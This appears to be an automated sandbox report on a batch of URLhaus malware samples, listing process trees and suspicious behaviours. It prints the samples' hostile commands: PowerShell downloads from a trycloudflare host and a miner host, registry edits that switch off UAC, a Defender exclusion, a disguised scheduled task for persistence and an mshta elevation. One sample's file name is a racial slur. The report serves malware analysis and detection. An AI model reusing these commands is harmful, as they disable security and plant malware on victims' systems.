N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1104 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 1104 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 3240 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 3240 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 3528 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 4996 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 4996 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3528 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3528 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
PID 3240 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
PID 3240 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3916 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\saw.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://varied-flux-emails-grounds.trycloudflare.com/a.pdf

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ff913ca3cb8,0x7ff913ca3cc8,0x7ff913ca3cd8

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://varied-flux-emails-grounds.trycloudflare.com/qfv0ao.zip' -OutFile 'C:\Users\Admin\Downloads\qfv0ao.zip' }"

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,8075079479667735122,11979470742618103990,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,8075079479667735122,11979470742618103990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,8075079479667735122,11979470742618103990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8075079479667735122,11979470742618103990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8075079479667735122,11979470742618103990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe

"C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe"

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\app64.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8075079479667735122,11979470742618103990,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=1932,8075079479667735122,11979470742618103990,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=4908 /prefetch:6

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A383.tmp\A384.tmp\A385.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"

C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe

"C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\c3pool7.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe

"C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE9F.tmp\AEB0.tmp\AEB1.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe

"C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe'

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2144 -ip 2144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1440

C:\Users\Admin\Downloads\UrlHausFiles\EbjU3lW.exe

"C:\Users\Admin\Downloads\UrlHausFiles\EbjU3lW.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff913ca3cb8,0x7ff913ca3cc8,0x7ff913ca3cd8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x48,0x7ff8fee8cc40,0x7ff8fee8cc4c,0x7ff8fee8cc58

C:\Users\Admin\Downloads\UrlHausFiles\RuntimeBroker.exe

"C:\Users\Admin\Downloads\UrlHausFiles\RuntimeBroker.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1820 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1756,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

